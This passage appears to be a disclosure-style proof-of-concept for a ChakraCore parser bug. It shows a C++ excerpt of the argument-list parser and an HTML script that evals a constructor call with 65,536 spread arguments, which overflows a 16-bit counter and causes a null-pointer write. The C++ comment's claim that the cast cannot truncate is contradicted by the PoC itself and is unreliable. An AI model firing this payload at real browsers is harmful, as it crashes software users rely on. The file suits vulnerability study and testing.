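    if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){
        CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);
    }

    // count <= 0xffff is guaranteed by the check in the loop, so the cast
    // cannot truncate.
    *pCount = static_cast<uint16>(count);
    if (buildAST)
    {
        AssertMem(lastNodeRef);
        AssertNodeMem(*lastNodeRef);
        pnodeList->ichLim = (*lastNodeRef)->ichLim;
    }

    return pnodeList;
}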
-->
<html>
<head>
<title> POC </title>
</head>
<script>
 
// Builds a `new` expression with 0x10000 (65536) spread arguments ('...a').
// Parser::ParseArgList counts arguments in a uint16, so both *pCount and
// *pSpreadArgCount wrap to 0; EmitArgList therefore allocates no spread-index
// array and EmitArgs writes through a null pointer (see the crash dump above).
var a=[];
a.length=0xFFFF+1;
a.fill('...a');
var b="function Car(){}; var car=new Car("+a.join()+");";
//alert(b);
eval(b);
 
</script>
</html>